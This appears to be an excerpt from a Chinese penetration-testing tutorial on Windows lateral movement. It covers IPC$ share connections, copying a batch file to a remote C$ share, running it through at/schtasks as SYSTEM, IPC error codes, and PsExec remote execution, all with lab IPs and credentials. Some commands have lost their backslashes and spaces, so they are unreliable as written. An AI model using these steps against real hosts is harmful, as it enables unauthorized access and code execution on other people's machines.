0x01 前言
因为在
IPC 利用条件
- 1、139 或 445 端口开启:ipc 连接可以实现远程登录及对默认共享的访问;而 139 端口 的开启表示 netbios 协议的应用,我们可以通过 139、445 端口实现对共享文件/打印机的访 问
- 2、管理员开启了默认共享:默认共享是为了方便管理员远程管理而默认开启的共享, 即所有的逻辑盘(C$、d$、e$…)和系统目录 winnt 或者 windows(admin$)
4.2.1.2 建立 IPC 连接、copy 文件、创建计划任务
net use \192.168.19.169c$test@123/user:adtestjeff1
copy1.bat \192.168.19.169c$
net time \192.168.19.169
at \192.168.19.1691:03c:1.bat
schtasks
由于 at 在新版本的系统中已被弃用,我们需要用 schtasks 替代
schtasks/create/s192.168.19.177/uadtestjeff1/ptest@123/ru"SYSTEM"/tntest/scDAILY/trc:1.bat/F
创建计划任务,/s 指定远程机器名或 ip 地址,/ru 指定运行任务的用户权限,这里指定 为最高的 SYSTEM,/tn 是任务名称,/sc 是任务运行频率,这里指定为每天运行,并没什么 实际意义,/tr 指定运行的文件,/F 表示如果指定的任务已经存在,则强制创建任务并抑制警告
运行任务,其中/i 表示立即运行
schtasks/run /s192.168.19.177/u adtestjeff1 /p test@123/tn test /i
删除计划任务
schtasks/delete /s192.168.19.177/u adtestjeff1 /p test@123/tn test /f
4.2.1.3 IPC 常见错误
错误号 5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号 51,Windows 无法找到网络路径 : 网络有问题;
错误号 53,找不到网络路径 : ip 地址错误;目标未开机;目标 lanmanserver 服务未启动; 目标有防火墙(端口过滤);
错误号 67,找不到网络名 : 你的 lanmanworkstation 服务未启动;目标删除了 ipc$; 错 误号 1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个 ipc$,请删除再 连。
错误号 1326,未知的用户名或错误密码:原因很明显了;
错误号 1792,试图登录,但是网络登录服务没有启动:目标 NetLogon 服务未启动。(连接 域控会出现此情况)
错误号 2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
4.2.1.4 PsTools
PsTools 是 sysinternals 开发的一个功能强大的安全管理工具包,最新版目前共有 13 个 各种功能的小工具。这里介绍下 psexec,psexec 是一款远程执行命令的工具,在内网渗透 的时候常它来进行横向移动。 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
PsExec
1、 若已建立 IPC$连接,无需再次输入账号密码,所有 pstools 工具可直接使用 net use //查看 ipc 连接状态
2、 若未建立 IPC 连接,则要使用账号密码进行登录
PsExec.exe \192.168.19.178-u adtestjeff1 -ptest@123cmd.exe
